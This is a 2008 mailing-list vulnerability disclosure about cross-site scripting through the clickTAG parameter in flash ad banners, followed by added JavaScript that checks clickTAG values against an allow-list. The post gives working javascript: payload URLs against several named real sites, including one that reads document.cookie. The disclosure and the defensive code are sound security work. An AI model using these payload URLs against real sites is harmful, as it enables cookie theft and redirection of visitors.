[WEB SECURITY] XSS vulnerabilities in 215000 flash files

MustLive mustlive at websecurity.com.ua
Thu Nov 27 13:22:46 EST 2008


Hello to the Web Security Mailing List!

It's my first letter to the list, and I decided to inform the community about my 
interesting finding.

Recently, on the 12th of November 2008, I found XSS vulnerabilities in 215000 flash 
files. I wrote about it at my site http://websecurity.com.ua/2609/ (in 
Ukrainian), and this is the English version of my article.

During my research of the vulnerability at cpmstar.com 
(http://websecurity.com.ua/2607/), which I found on 19.01.2008, I found that 
there are many flash files on the Internet with the same vulnerability. In total 
there are up to 215000 flash files on the Internet which are vulnerable to 
Cross-Site Scripting (at more than 200000 sites).

This can be seen from Google's data:

http://www.google.com.ua/search?q=filetype%3Aswf+inurl%3AclickTAG (note: at the 
current time Google shows a different number, which is common for it)

And these are only those flashes which were indexed by Google; actually 
there can be many more of them. In the results there are sites with 
non-vulnerable flash files (or sites which no longer have the mentioned flashes), 
but these are single instances, and almost all sites in Google's search results 
are vulnerable. Besides, last year I already wrote that 500000 flash 
files at popular sites are vulnerable to XSS 
(http://websecurity.com.ua/1689/).

XSS:

The vulnerability is in the following AS code:

getURL(_root.clickTAG, "_blank");

The attack occurs via passing XSS code to the flash file in the parameter clickTAG:

http://site/flash.swf?clickTAG=javascript:alert('XSS')

After a click on the flash, the string passed to the flash via the parameter 
clickTAG is transferred to the function getURL. Thus the JS code which was 
passed to the flash can be executed.

At http://server.cpmstar.com:

http://server.cpmstar.com/cached/creatives/1499_728_90_games.swf?clickTAG=javascript:alert('XSS')

Note that flashes with target = "_blank" (in getURL) do not allow access to 
cookies. And they also do not work in IE6. If target is set to something other 
than "_blank" (or not set at all), then flashes give the possibility to access 
cookies in all browsers (and they work in IE6).

Here are other examples of vulnerable flashes at three sites:

At http://www.banjohangout.org:

http://www.banjohangout.org/img/ads/fitch2b.swf?clickTAG=javascript:alert('XSS')

At http://ad1.emediate.dk:

http://ad1.emediate.dk/media.1/165/2861/15816/HP_Workstation_300x250-clickTAG.swf?clickTAG=javascript:alert('XSS')

At http://www.open4smart.eu:

http://www.open4smart.eu/sitesimages/artclbanners/468x60.swf?clickTAG=javascript:alert('XSS')

There are similar flashes, which use the variable clickTAG, with the following 
AS code:

getURL(_root.clickTAG, _root.TargetAS);

The attack occurs using the variables clickTAG and TargetAS:

http://site/flash.swf?clickTAG=javascript:alert('XSS')&TargetAS=

At http://www.adspeed.com:

http://www.adspeed.com/as/media/sample-clickTAG.swf?clickTAG=javascript:alert('XSS')&TargetAS=
http://www.adspeed.com/as/media/sample-clickTAG.swf?clickTAG=javascript:alert(document.cookie)&TargetAS=
http://www.adspeed.com/as/media/sample-clickTAG.swf?clickTAG=javascript:document.location%3D'http://websecurity.com.ua'&TargetAS=

This allows access to cookies in all browsers, and the attack works normally in 
IE.

These XSS are strictly social XSS, which I already mentioned concerning the 
vulnerability at craigslist.org (http://websecurity.com.ua/2206/). I first 
introduced this type of XSS hole last year with Cross-Site Scripting 
in Mozilla and Firefox (http://websecurity.com.ua/1413/). I'll write in 
detail about this class of vulnerabilities.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
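The two vulnerable patterns above (getURL(_root.clickTAG, "_blank") and getURL(_root.clickTAG, _root.TargetAS)) fail because the clickTAG value is never checked before it reaches getURL. The following is an added example, not code from MustLive's post: a scheme allow-list for clickTAG and a target allow-list for TargetAS, written in JavaScript so it can be run against the request URL of a .swf (for instance in an ad server or a request log review); the same two checks are what the flash file itself should apply before calling getURL. The function names and the sample requests are constructed for this example.

```javascript
// Added example: allow-list checks for the clickTAG / TargetAS parameters.
// A flash file that passes _root.clickTAG straight to getURL() will open any
// "javascript:" value placed in the query string. Accepting only absolute
// http(s) URLs, and only known window targets, removes that path.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
const ALLOWED_TARGETS = new Set(["_blank", "_self", "_parent", "_top"]);

// True only for an absolute http:// or https:// URL. The WHATWG parser used by
// new URL() lowercases the scheme and strips leading whitespace and embedded
// tab/newline characters, so obfuscated "javascript:" values still fail here;
// relative or malformed input throws and is treated as unsafe.
function isSafeClickTag(value) {
  if (typeof value !== "string") return false;
  let parsed;
  try {
    parsed = new URL(value);
  } catch (e) {
    return false;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// getURL's second argument names a window. An empty TargetAS (as in the
// adspeed.com examples in the post) makes the page navigate in place, where a
// script URL runs with the page's cookies; anything outside the four reserved
// names therefore falls back to "_blank".
function safeTarget(value) {
  return ALLOWED_TARGETS.has(value) ? value : "_blank";
}

// Inspect one request for a .swf and report whether its clickTAG is safe.
// Returns { clickTag, target, safe } so a caller can log or block the request.
function checkSwfRequest(requestUrl) {
  const q = new URL(requestUrl).searchParams;
  const clickTag = q.get("clickTAG");
  const target = safeTarget(q.get("TargetAS"));
  // A missing clickTAG is fine: the flash simply has nothing to open.
  const safe = clickTag === null || isSafeClickTag(clickTag);
  return { clickTag, target, safe };
}

// Constructed sample requests: the attack URL shapes quoted in the post beside
// an ordinary advertiser landing page (advertiser.example is a placeholder).
const SAMPLE_REQUESTS = [
  "http://site/flash.swf?clickTAG=javascript:alert('XSS')",
  "http://site/flash.swf?clickTAG=javascript:alert('XSS')&TargetAS=",
  "http://site/flash.swf?clickTAG=http://advertiser.example/landing&TargetAS=_blank",
];

const RESULTS = SAMPLE_REQUESTS.map(checkSwfRequest);
```

The equivalent check inside the flash file is a scheme test on _root.clickTAG before getURL is called; without it, every site serving the unchecked banner inherits the hole.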

